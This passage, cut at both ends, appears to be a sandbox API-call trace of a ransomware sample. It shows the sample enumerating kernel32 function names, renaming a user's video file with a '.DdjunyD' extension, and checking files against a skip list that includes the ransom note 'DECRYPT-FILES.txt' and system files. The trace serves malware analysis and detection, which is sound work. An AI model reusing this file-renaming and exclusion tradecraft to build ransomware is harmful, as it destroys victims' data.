out: lpString1="CreateFiber") returned="CreateFiber" [0087.852] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.852] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.852] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.852] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.852] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.852] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.853] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.853] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.853] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.853] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.853] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.853] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.853] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.853] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.853] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.853] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.853] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.853] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.853] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.853] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.853] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.853] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.853] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.853] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.854] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.854] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.854] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.854] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.854] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.854] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.854] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.854] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.854] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.854] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.854] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.854] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.854] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.854] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.854] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.854] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.854] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.854] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.854] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.854] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.855] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.855] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.855] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.855] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.855] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.855] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.855] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.855] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.855] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.855] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.855] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.855] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.855] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.855] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.855] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.855] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.855] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.856] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.856] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.856] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.856] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.856] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.856] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.856] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.856] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.856] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.856] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.856] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.856] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.856] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.856] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.856] lstrlenA (lpString="DELETEATOM") returned 10 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.856] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.856] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.857] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.857] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.857] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.857] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.857] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.857] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.857] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.857] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.857] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.857] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.857] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.857] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.857] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.857] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.857] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.857] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.857] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.857] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.857] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.857] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.858] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.858] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.858] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.858] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.858] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.858] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.858] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.858] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.858] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.858] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.858] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.858] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.858] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.858] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.858] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.858] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.858] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.858] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.858] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.859] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.859] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf") returned 57 [0087.859] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf.DdjunyD") returned 65 [0087.859] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\voryc1w8zeziz1pk.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf.DdjunyD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\voryc1w8zeziz1pk.swf.ddjunyd"), dwFlags=0x0) returned 1 [0087.860] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.860] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.860] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.860] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdde0620, ftCreationTime.dwHighDateTime=0x1d4ccff, ftLastAccessTime.dwLowDateTime=0xd188e190, ftLastAccessTime.dwHighDateTime=0x1d4d320, ftLastWriteTime.dwLowDateTime=0xd188e190, ftLastWriteTime.dwHighDateTime=0x1d4d320, nFileSizeHigh=0x0, nFileSizeLow=0x18e5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xMpLxLM2esbvdeLtC.mp4", cAlternateFileName="XMPLXL~1.MP4")) returned 1 [0087.860] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0087.860] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="autorun.inf") returned 1 [0087.860] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="boot.ini") returned 1 [0087.860] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="desktop.ini") returned 1 [0087.861] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="ntuser.dat") returned 1 [0087.861] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="iconcache.db") returned 1 [0087.861] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="bootsect.bak") returned 1 [0087.861] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="ntuser.dat.log") returned 1 [0087.861] lstrcmpiW (lpString1="xMpLxLM2esbvdeLtC.mp4", lpString2="thumbs.db") returned 1 [0087.861] lstrcmpiW 